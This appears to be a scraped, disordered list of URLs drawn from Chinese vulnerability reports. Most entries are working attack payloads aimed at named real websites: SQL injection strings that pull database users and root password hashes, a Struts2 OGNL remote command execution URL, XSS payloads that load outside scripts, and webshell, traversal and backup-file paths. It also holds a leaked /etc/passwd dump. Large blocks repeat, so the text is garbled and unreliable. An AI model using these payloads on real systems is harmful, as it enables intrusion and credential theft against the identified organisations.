http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect@`1`,user(),version(),database() http://copartner.mbaobao.com/codapp/Admin/Login.aspx http://wap.mbaobao.com/index.php/order/info/orderId/订单号/type/2 www.anying.org http://control.blog.sina.com.cn/myblog/htmlsource/quotelist.php?blogid=4726dd840102e6yw'%20and%20substring http://qhsoftoa2012.gnway.net:8082 https://online.unionpay.com/huankuan/main.do https://online.unionpay.com/portal/index.do?username= user:cpinsweb shell:/home/cpinsweb/jboss-4.2.3.GA/server/default/./tmp/deploy/tmp4987379269087835336phoenix-portal-exp.war/ avahi-autoipd:x:102:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin cp_web:x:500:500:cp_web:/home/cp_web:/bin/bash monitor:x:501:500:monitor:/home/monitor:/bin/bash mk_web01:x:502:500:mk_web01:/home/mk_web01:/bin/bash um_web:x:503:500::/home/um_web:/bin/bash zabbix:x:504:502::/home/zabbix:/bin/bash cpinsweb:x:505:500::/home/cpinsweb:/bin/bash syschk:x:506:506::/home/syschk:/bin/bash jboss-4.2.3.GA/server/default/deploy/phoenix-portal.war http://shop.tcl.com/ http://www.jsj.edu.cn/index.php/default/index/sort/1 http://www.jsj.edu.cn/index.php/default/index/sort/1%20or%201 http://www.jsj.edu.cn/index.php/default/index/sort/1%20union%20all http://secaqb.anquanbao.org/xss.php http://secaqb.anquanbao.org/xss.php?gcode= width:1px;filter:glow%20onfilterchange=alert('piaoye') http://msdn.microsoft.com/en-us/library/ms532847%28VS.85%29.aspx http://secaqb.anquanbao.org/xss.php?gcode=%3Cembed%20src=http://www.p-ye.cn/cfrs/%20%3E%3C/embed%3E http://ha.ckers.org/xss.css http://secaqb.anquanbao.org/xss.php?gcode=%3CSTYLE%3E%40im%5Cpo%5Crt'http%3A%2F%2Fha.ckers.org%2Fxss.css'%3B%3C%2FSTYLE%3E http://secaqb.anquanbao.org/xss.php?gcode=%3CDIV%20STYLE%3D%22width%3A%EF%BD%85%EF%BD%98pre%EF%BD%93sion(alert('piaoye'))%3B%22%3E ascript:alert('anyunix') 
http://secaqb.anquanbao.org/xss.php?gcode=%3CIMG%20SRC%3D%22jav%26%23x09%3Bascript%3Aalert('piaoye')%3B%22%3E http://ha.ckers.org/xss.css http://secaqb.anquanbao.org/xss.php?gcode=%3Clink%20rel%3D%22stylesheet%22%20HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E javascript:alert('XSS') script:alert('piaoye') http://secaqb.anquanbao.org/xss.php?gcode=%3CTABLE%20BACKGROUND%3D%22java%26%23x0D%3Bscript%3Aalert('piaoye')%22%3E http://123.125.116.213/ http://wooyun.org/bugs/wooyun-2010-022762 http://wooyun.org/bugs/wooyun-2010-019360 http://114.112.94.111/) http://114.112.94.111/logs/) http://mgm.1kan.tv(这里说一下 http://mgm.1kan.tv http://mgm.1kan.tv http://secaqb.anquanbao.org/sqlin.php?id=-9.union%0Bselect~1,database%28%29,3,4 http://jianli.58.com/interviewinvitereceive/?list=apply&type=1&infoid=13503944312714 http://su.58.com/tech/12972441389827x.shtml http://jianli.58.com/interviewinvitereceive/?list=apply&type=1&infoid=12972441389827 http://qipai.sina.com.cn/news_content.php?id=141 http://qipai.sina.com.cn/news_content.php?id=640 http://qipai.sina.com.cn/news_content.php?id=637 javascript:alert(document.cookie) http://love.ganji.com/199909446.htm http://sd6.tbcdn.cn/dcAsyn.htm?h=p_lazyHd_sid130918286_pid185916040&v=1&sv=1&siteId=3&virtual=false&flagShip=false&int=false&ins=true&dn=&sci=2&dvh=1&dr=1&df=1&l=p_lazyLeft_sid130918286_pid185916040&r=p_lazyRight_sid130918286_pid185916040&f=p_lazyFt_sid130918286_pid185916040&t=1369289309136&css=css_sid62168109 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?Author=黄志光 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?Author=黄志光 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?黄志光 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?Author=黄志光 www.lzj【马赛克】.com http://whois.chinaz.com/www.lzj【马赛克】.com www.net.cn www.west263.com www.szhot.com www.sudu.cn www.npointhost.com www.eb.com.cn http://www.baidu.com:80@www.evil.com/之类的域名没有进行跳转提示或者显示真实域名,用户可能会被一个恶意构造的域名欺骗。 http://www.evil.com/ 
http://wap.uc.cn/index.php?action=BrandPicApi&brand=nokia http://wap.ucweb.com/test/ http://xss.tw/XXX http://db.duowan.com/sgcq/zb.php?key=%E6%88%98%E5%A3%AB www.sxinfo.gov.cn http://218.26.227.165/book/topic/vote/Com_content.do?label=2012news&id=8a8a899b3d803908013d80a578e10016 dword:00000002 http://sourceforge.net/projects/filezilla/ http://ip.filezilla-project.org/ip.php http://www.doov.com.cn/dwnews.html?layout=dvnewdetails&sid=1&artid=1094%20and%201=2%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 http://www.doov.com.cn/dwnews.html?layout=dvnewdetails&sid=1&artid=1094%20and%201=2%20union%20select%201,Password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20mysql.user%20where%20User%20=%20'root http://www.doov.com.cn/dadmin/Sys_login.php http://beian.021.net/ http://www.xinwanwang.cn/reg/Handle.asp?OrderID=host_m31305230007 http://fatezero.07073.com/Default_Search.html http://sucai.manage.meitu.com/sucai/index.php?type=1 http://www.yto.net.cn/cn/human/detail.aspx?action=jobDetails&Recruittypeid=1&stylePath=jobDetailsStyle.xsl http://video.sina.com.cn/v/b/78301751-2731820701.html http://www.baidu.com/baidu?word=%22%2F%3E%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&tn=myie2dg&ch=6 http://ad.msn.cn/login!devhelpRedirect.action http://ad.msn.cn/KSSG.txt http://www.chekucafe.com/content_cyxm.php?NID=2 http://crm.septwolves.com:8080/?app_act=index/login http://www.hzlib.org/opac/websearch/bookSearch?cmdACT=detailmarc&xsl=listdetailmarc.xsl&bookrecno=22344 http://wooyun.org/bugs/wooyun-2010-020127,建议乌云联系厂商让那个开发这个系统的公司逐个联系用户修复漏洞,不然后果不堪设想,涉及范围很广,这里我只拿惠州慈云图书馆出来说 http://jixiechang.lxjx.cn/cnsail/inc/data.asp通过新建一个ASP后缀的数据库,插入一句话,可以获取Webshell并且服务器权限设置不当可以服务器目录。 http://biz.finance.sina.com.cn/zjztadmin/expert_login.php http://stb.mcprc.gov.cn http://stb.mcprc.gov.cn/ccnt-webapp/pages/CcntNj/list.do 
http://stb.mcprc.gov.cn/ccnt-webapp/pages/CcntZzpg/list.do xssing.me/api3354 http://www.baidu.com/s?tn=monline_4_dg&ie=utf-8&bs=runat%3D%22%3C%2F%3E+%3Cscript+src%3D%2F%2Fxssing.me%2Fapi3354%3E%3C%2Fscript%3E&f=8&rsv_bp=1&wd=runat%3D%22%3C%2F%3E+%3Cscript+src%3D%2F%2Fxssing.me%2Fapi3354%3E%3C%2Fscript%3E&inputT=0 http://www.qdbus.com.cn/news/guanli.asp http://event.youku.com/littlesheep/winter/admin/login.php http://www.hlschina.com/CXLXBackzh/login.aspx http://www.gzszk.com:8000/web/include/content.php?contentID=145 http://www.go.cn/index.php?m=settings http://i.maxthon.cn/)XSS跨站+拒绝服务[遨游今日PR:6 http://i.maxthon.cn/#!w="/ http://member.aili.com/?c=member&m=album&a=albumlist&uid=1031420 http://www.imaidan.com/ http://www.imaidan.com/www.imaidan.com.rar http://www.nd56.com/ http://124.172.[马赛克]/Query.asp http://icareer.huawei.com/db.rar http://nj.lsaic.gov.cn:7011/i!index.action jtshys.tongji.edu.cn/login.action www.winads.cn/ad/userAction!login.action http://bbs.webscan.360.cn/forum.php?mod=viewthread&tid=8613&extra=page%3D1 http://www.glvchina.com/chinese/course/company/feedbacks.php?id=4 http://218.94.1.166/ http://shop103844734.taobao.com http://qq3g.trip8080.com http://qq3g.trip8080.com/user/findPwdType.htm http://bbs.lbsyun.baidu.com/ http://bbs.lbsyun.baidu.com/images/default/baidu_logo.gif/.php http://bbs.lbsyun.baidu.com/attachments/month_1305/13052518193284fcae877eeb41.gif d813186c2b076e696d9955621c2b5c1c:dda447在cmd5上没解出来,于是也就没再继续深入了 http://www.hokoexp.com/loadnews.do?method=show&newstype=1%20AND%209168=DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2899%29||CHR%2887%29||CHR%2881%29||CHR%28104%29,5%29 http://www.pfc.cn/tongxuelu/admin/login.asp http://biz.finance.sina.com.cn/hk/SehkNews_one.php?id=186503 http://hd.jstv.com/xiaohua/regist.aspx# http://61.135.251.48 http://www.yz-hotels.cn/index.php/hotels http://www.yz-hotels.cn/index.php/hotels/book http://secaqb.anquanbao.org/sqlin.php?id=%281%29union/*!select/*%0A*/1,user%28%29,3,4*/from%20mysql.user 
http://www.nite.org.cn/web.rar http://secaqb.anquanbao.org/sqlin.php?id=%281%29%20union/*%0A*/select%20/*%0A*/1,user,password,4%20from/*%0A*/mysql.user http://eps.shmetro.com/ieps/DispatchAction.do?efFormEname=DXPS0001&serviceName=DXPS0001 site:pinyin.cn server:/usr/lib/jvm/java-6-openjdk/jre/lib/amd64:/usr/lib/jvm/java-6-openjdk/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib/jni:/lib:/usr/lib http://java.sun.com/ http://gdvalue.gdca.gov.cn http://datagdca.gdca.gov.cn http://flower.guilinlife.com/flower/flower_florist_cart.php http://fc.118100.cn http://eps.baosteel.net.cn/eps_shp_mem/commodity/indexEs.jsp?custId=U33888 http://sir.uibe.edu.cn/dvbbs/UploadFile/2013-5/20135271532078359.php http://mzj.dl.gov.cn:8080/loginaction.action http://fans.wanmei.com/ http://118.145.10.14:8080/webfile/images/wangba/barinfo/xiejue1234561369721333725.jsp http://service-parts.mercedes-benz.com/dcagportal/DCAGPortal/login.action http://123.126.99.35/ http://110.249.253.166:82/gxtxm/regUser.action http://127.0.0.1/ecshop/languages/en_us/common.php http://www.qq.com&e.eeuha.com/ozign http://www.17ugo.com/user.php?act=order_detail&order_id=284470 http://127.0.0.1/ecshop/user.php http://wave.renren.com/about.aspx?type=M&class=M10&year=2006 http://beijing.kuyiso.com/channel.asp?bigcityid=1&ctype=97&zpqzflag=1&wbkeyword=%% http://zone.wooyun.org/content/3565 http://wq.tom.com/plus/feedback.php?action=send&comtype=comments&aid=1&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=slep&title=1',"'",1,3,4,5,6,7,8 http://wq.tom.com/plus/feedback.php?action=send&comtype=reply&fid=引用楼层&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=angr&title=1&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA&validate=验证码 http://wq.tom.com/dede/login.php http://wq.tom.com/plus/feedback.php?action=send&comtype=comments&aid=1&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=slep&title=1',(char(@`'`)),/*&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA&validate=验证码 
http://www.phpwind.net/read/2993589 http://www.xxxxxx.com.cn/edit/db/ewebeditor.mdb http://www.ocnsh.com.cn/admin/aspcheck.asp http://www.chinarishi.gov.cn/gonggaoneirong.php?id=448此处存在注入漏洞 http://www.cshtz.gov.cn/spweb/serviceOnline/baseinfo/baseinfoonline.jsp http://book.duokan.com/__duokan_appapi/packed/store/ipad_review.html?book_id=77779b94acd94d38a451bd69658f9bc3&build=2013030401 http://www.bidding.citic.com/work/work!workList_front.action javascript:alert(document.cookie) http://bj.58.com/xingqu/13977470055945x.shtml http://www.pmcitic.com/news/news!newsList_front.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43req\75@org.apache.struts2.ServletActionContext@getRequest%28%29%27%29%28d%29%29&%28h%29%28%28%27\43webRootzpro\75@java.lang.Runtime@getRuntime%28%29.exec%28\43req.getParameter%28%22cmd%22%29%29%27%29%28d%29%29&%28i%29%28%28%27\43webRootzproreader\75new\40java.io.DataInputStream%28\43webRootzpro.getInputStream%28%29%29%27%29%28d%29%29&%28i01%29%28%28%27\43webStr\75new\40byte[1024]%27%29%28d%29%29&%28i1%29%28%28%27\43webRootzproreader.readFully%28\43webStr%29%27%29%28d%29%29&%28i111%29%28%28%27\43webStr12\75new\40java.lang.String%28\43webStr%29%27%29%28d%29%29&%28i2%29%28%28%27\43xman\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i2%29%28%28%27\43xman\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i95%29%28%28%27\43xman.getWriter%28%29.println%28\43webStr12%29%27%29%28d%29%29&%28i99%29%28%28%27\43xman.getWriter%28%29.close%28%29%27%29%28d%29%29&cmd=cmd%20/c%20ipconfig 
http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Huawei.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Dell.Force10.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Netflow.v5.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=../ http://member.ffpic.com/tools/FindPass.ashx http://pmscjss.mofcom.gov.cn/auc/_news/newslist_common.jsp?cata=1 http://pmscjss.mofcom.gov.cn/auc/merge/sql.sql http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=9 http://zhidao.baidu.com/question/437176497.html http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=-9%20or(-1)in(1) http://secaqb.anquanbao.org/sqlin.php?id=-9%20union http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%20select http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%0b1,user(),version(),database() http://blog.anquanbao.org/61/ http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%201,user(),version(),database() http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect-1,user(),version(),database() http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%2b1,user(),version(),database() http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect@`1`,user(),version(),database() http://copartner.mbaobao.com/codapp/Admin/Login.aspx http://wap.mbaobao.com/index.php/order/info/orderId/订单号/type/2 www.anying.org 
http://control.blog.sina.com.cn/myblog/htmlsource/quotelist.php?blogid=4726dd840102e6yw'%20and%20substring http://qhsoftoa2012.gnway.net:8082 https://online.unionpay.com/huankuan/main.do https://online.unionpay.com/portal/index.do?username= user:cpinsweb shell:/home/cpinsweb/jboss-4.2.3.GA/server/default/./tmp/deploy/tmp4987379269087835336phoenix-portal-exp.war/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ais:x:39:39:openais Framework:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin luci:x:100:101::/var/lib/luci:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X 
Server:/etc/X11/fs:/sbin/nologin ricci:x:101:102:ricci user:/var/lib/ricci:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:102:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin cp_web:x:500:500:cp_web:/home/cp_web:/bin/bash monitor:x:501:500:monitor:/home/monitor:/bin/bash mk_web01:x:502:500:mk_web01:/home/mk_web01:/bin/bash um_web:x:503:500::/home/um_web:/bin/bash zabbix:x:504:502::/home/zabbix:/bin/bash cpinsweb:x:505:500::/home/cpinsweb:/bin/bash syschk:x:506:506::/home/syschk:/bin/bash jboss-4.2.3.GA/server/default/deploy/phoenix-portal.war http://shop.tcl.com/ http://www.jsj.edu.cn/index.php/default/index/sort/1 http://www.jsj.edu.cn/index.php/default/index/sort/1%20or%201 http://www.jsj.edu.cn/index.php/default/index/sort/1%20union%20all http://secaqb.anquanbao.org/xss.php http://secaqb.anquanbao.org/xss.php?gcode= width:1px;filter:glow%20onfilterchange=alert('piaoye') http://msdn.microsoft.com/en-us/library/ms532847%28VS.85%29.aspx http://secaqb.anquanbao.org/xss.php?gcode=%3Cembed%20src=http://www.p-ye.cn/cfrs/%20%3E%3C/embed%3E http://ha.ckers.org/xss.css http://secaqb.anquanbao.org/xss.php?gcode=%3CSTYLE%3E%40im%5Cpo%5Crt'http%3A%2F%2Fha.ckers.org%2Fxss.css'%3B%3C%2FSTYLE%3E http://secaqb.anquanbao.org/xss.php?gcode=%3CDIV%20STYLE%3D%22width%3A%EF%BD%85%EF%BD%98pre%EF%BD%93sion(alert('piaoye'))%3B%22%3E ascript:alert('anyunix') http://secaqb.anquanbao.org/xss.php?gcode=%3CIMG%20SRC%3D%22jav%26%23x09%3Bascript%3Aalert('piaoye')%3B%22%3E http://ha.ckers.org/xss.css http://secaqb.anquanbao.org/xss.php?gcode=%3Clink%20rel%3D%22stylesheet%22%20HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E javascript:alert('XSS') script:alert('piaoye') http://secaqb.anquanbao.org/xss.php?gcode=%3CTABLE%20BACKGROUND%3D%22java%26%23x0D%3Bscript%3Aalert('piaoye')%22%3E http://123.125.116.213/ http://wooyun.org/bugs/wooyun-2010-022762 
http://wooyun.org/bugs/wooyun-2010-019360 http://114.112.94.111/) http://114.112.94.111/logs/) http://mgm.1kan.tv(这里说一下 http://mgm.1kan.tv http://mgm.1kan.tv http://secaqb.anquanbao.org/sqlin.php?id=-9.union%0Bselect~1,database%28%29,3,4 http://jianli.58.com/interviewinvitereceive/?list=apply&type=1&infoid=13503944312714 http://su.58.com/tech/12972441389827x.shtml http://jianli.58.com/interviewinvitereceive/?list=apply&type=1&infoid=12972441389827 http://qipai.sina.com.cn/news_content.php?id=141 http://qipai.sina.com.cn/news_content.php?id=640 http://qipai.sina.com.cn/news_content.php?id=637 javascript:alert(document.cookie) http://love.ganji.com/199909446.htm http://sd6.tbcdn.cn/dcAsyn.htm?h=p_lazyHd_sid130918286_pid185916040&v=1&sv=1&siteId=3&virtual=false&flagShip=false&int=false&ins=true&dn=&sci=2&dvh=1&dr=1&df=1&l=p_lazyLeft_sid130918286_pid185916040&r=p_lazyRight_sid130918286_pid185916040&f=p_lazyFt_sid130918286_pid185916040&t=1369289309136&css=css_sid62168109 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?Author=黄志光 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?Author=黄志光 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?黄志光 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?Author=黄志光 www.lzj【马赛克】.com http://whois.chinaz.com/www.lzj【马赛克】.com www.net.cn www.west263.com www.szhot.com www.sudu.cn www.npointhost.com www.eb.com.cn http://www.baidu.com:80@www.evil.com/之类的域名没有进行跳转提示或者显示真实域名,用户可能会被一个恶意构造的域名欺骗。 http://www.evil.com/ http://wap.uc.cn/index.php?action=BrandPicApi&brand=nokia http://wap.ucweb.com/test/ http://xss.tw/XXX http://db.duowan.com/sgcq/zb.php?key=%E6%88%98%E5%A3%AB www.sxinfo.gov.cn http://218.26.227.165/book/topic/vote/Com_content.do?label=2012news&id=8a8a899b3d803908013d80a578e10016 dword:00000002 http://sourceforge.net/projects/filezilla/ http://ip.filezilla-project.org/ip.php 
http://www.doov.com.cn/dwnews.html?layout=dvnewdetails&sid=1&artid=1094%20and%201=2%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 http://www.doov.com.cn/dwnews.html?layout=dvnewdetails&sid=1&artid=1094%20and%201=2%20union%20select%201,Password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20mysql.user%20where%20User%20=%20'root http://www.doov.com.cn/dadmin/Sys_login.php http://beian.021.net/ http://www.xinwanwang.cn/reg/Handle.asp?OrderID=host_m31305230007 http://fatezero.07073.com/Default_Search.html http://sucai.manage.meitu.com/sucai/index.php?type=1 http://www.yto.net.cn/cn/human/detail.aspx?action=jobDetails&Recruittypeid=1&stylePath=jobDetailsStyle.xsl http://video.sina.com.cn/v/b/78301751-2731820701.html http://www.baidu.com/baidu?word=%22%2F%3E%3Cscript%3Ealert(%2Fxss%2F)%3C%2Fscript%3E&tn=myie2dg&ch=6 http://ad.msn.cn/login!devhelpRedirect.action http://ad.msn.cn/KSSG.txt http://www.chekucafe.com/content_cyxm.php?NID=2 http://crm.septwolves.com:8080/?app_act=index/login http://www.hzlib.org/opac/websearch/bookSearch?cmdACT=detailmarc&xsl=listdetailmarc.xsl&bookrecno=22344 http://wooyun.org/bugs/wooyun-2010-020127,建议乌云联系厂商让那个开发这个系统的公司逐个联系用户修复漏洞,不然后果不堪设想,涉及范围很广,这里我只拿惠州慈云图书馆出来说 http://jixiechang.lxjx.cn/cnsail/inc/data.asp通过新建一个ASP后缀的数据库,插入一句话,可以获取Webshell并且服务器权限设置不当可以服务器目录。 http://biz.finance.sina.com.cn/zjztadmin/expert_login.php http://stb.mcprc.gov.cn http://stb.mcprc.gov.cn/ccnt-webapp/pages/CcntNj/list.do http://stb.mcprc.gov.cn/ccnt-webapp/pages/CcntZzpg/list.do xssing.me/api3354 http://www.baidu.com/s?tn=monline_4_dg&ie=utf-8&bs=runat%3D%22%3C%2F%3E+%3Cscript+src%3D%2F%2Fxssing.me%2Fapi3354%3E%3C%2Fscript%3E&f=8&rsv_bp=1&wd=runat%3D%22%3C%2F%3E+%3Cscript+src%3D%2F%2Fxssing.me%2Fapi3354%3E%3C%2Fscript%3E&inputT=0 http://www.qdbus.com.cn/news/guanli.asp http://event.youku.com/littlesheep/winter/admin/login.php 
http://www.hlschina.com/CXLXBackzh/login.aspx http://www.gzszk.com:8000/web/include/content.php?contentID=145 http://www.go.cn/index.php?m=settings http://i.maxthon.cn/)XSS跨站+拒绝服务[遨游今日PR:6 http://i.maxthon.cn/#!w="/ http://member.aili.com/?c=member&m=album&a=albumlist&uid=1031420 http://www.imaidan.com/ http://www.imaidan.com/www.imaidan.com.rar http://www.nd56.com/ http://124.172.[马赛克]/Query.asp http://icareer.huawei.com/db.rar http://nj.lsaic.gov.cn:7011/i!index.action jtshys.tongji.edu.cn/login.action www.winads.cn/ad/userAction!login.action http://bbs.webscan.360.cn/forum.php?mod=viewthread&tid=8613&extra=page%3D1 http://www.glvchina.com/chinese/course/company/feedbacks.php?id=4 http://218.94.1.166/ http://shop103844734.taobao.com http://qq3g.trip8080.com http://qq3g.trip8080.com/user/findPwdType.htm http://bbs.lbsyun.baidu.com/ http://bbs.lbsyun.baidu.com/images/default/baidu_logo.gif/.php http://bbs.lbsyun.baidu.com/attachments/month_1305/13052518193284fcae877eeb41.gif d813186c2b076e696d9955621c2b5c1c:dda447在cmd5上没解出来,于是也就没再继续深入了 http://www.hokoexp.com/loadnews.do?method=show&newstype=1%20AND%209168=DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2899%29||CHR%2887%29||CHR%2881%29||CHR%28104%29,5%29 http://www.pfc.cn/tongxuelu/admin/login.asp http://biz.finance.sina.com.cn/hk/SehkNews_one.php?id=186503 http://hd.jstv.com/xiaohua/regist.aspx# http://61.135.251.48 http://www.yz-hotels.cn/index.php/hotels http://www.yz-hotels.cn/index.php/hotels/book http://secaqb.anquanbao.org/sqlin.php?id=%281%29union/*!select/*%0A*/1,user%28%29,3,4*/from%20mysql.user http://www.nite.org.cn/web.rar http://secaqb.anquanbao.org/sqlin.php?id=%281%29%20union/*%0A*/select%20/*%0A*/1,user,password,4%20from/*%0A*/mysql.user http://eps.shmetro.com/ieps/DispatchAction.do?efFormEname=DXPS0001&serviceName=DXPS0001 site:pinyin.cn server:/usr/lib/jvm/java-6-openjdk/jre/lib/amd64:/usr/lib/jvm/java-6-openjdk/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib/jni:/lib:/usr/lib http://java.sun.com/ 
http://gdvalue.gdca.gov.cn http://datagdca.gdca.gov.cn http://flower.guilinlife.com/flower/flower_florist_cart.php http://fc.118100.cn http://eps.baosteel.net.cn/eps_shp_mem/commodity/indexEs.jsp?custId=U33888 http://sir.uibe.edu.cn/dvbbs/UploadFile/2013-5/20135271532078359.php http://mzj.dl.gov.cn:8080/loginaction.action http://fans.wanmei.com/ http://118.145.10.14:8080/webfile/images/wangba/barinfo/xiejue1234561369721333725.jsp http://service-parts.mercedes-benz.com/dcagportal/DCAGPortal/login.action http://123.126.99.35/ http://110.249.253.166:82/gxtxm/regUser.action http://127.0.0.1/ecshop/languages/en_us/common.php http://www.qq.com&e.eeuha.com/ozign http://www.17ugo.com/user.php?act=order_detail&order_id=284470 http://127.0.0.1/ecshop/user.php http://wave.renren.com/about.aspx?type=M&class=M10&year=2006 http://beijing.kuyiso.com/channel.asp?bigcityid=1&ctype=97&zpqzflag=1&wbkeyword=%% http://zone.wooyun.org/content/3565 http://wq.tom.com/plus/feedback.php?action=send&comtype=comments&aid=1&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=slep&title=1',"'",1,3,4,5,6,7,8 http://wq.tom.com/plus/feedback.php?action=send&comtype=reply&fid=引用楼层&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=angr&title=1&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA&validate=验证码 http://wq.tom.com/dede/login.php http://wq.tom.com/plus/feedback.php?action=send&comtype=comments&aid=1&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=slep&title=1',(char(@`'`)),/*&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA&validate=验证码 http://scrcu.21tb.com/login/login.logout.do http://localhost/ecshop/languages/zh_cn/user.php http://localhost/ecshop/languages/zh_cn/fuck.php http://bbs.cjxtv.com/存在遍历 http://bbs.cjxtv.com/Data/ http://itgroup.jcdecauxchina.com.cn:8000/Login.aspx http://app.finance.ifeng.com/finance/fundhtml/jjfh.php?comp=1&fund=0&p=5&year=2013 http://www.uxdaward.org/member/ http://localhost/manager/user.do?method=emailForCheckingAdmin width:400 width:400 
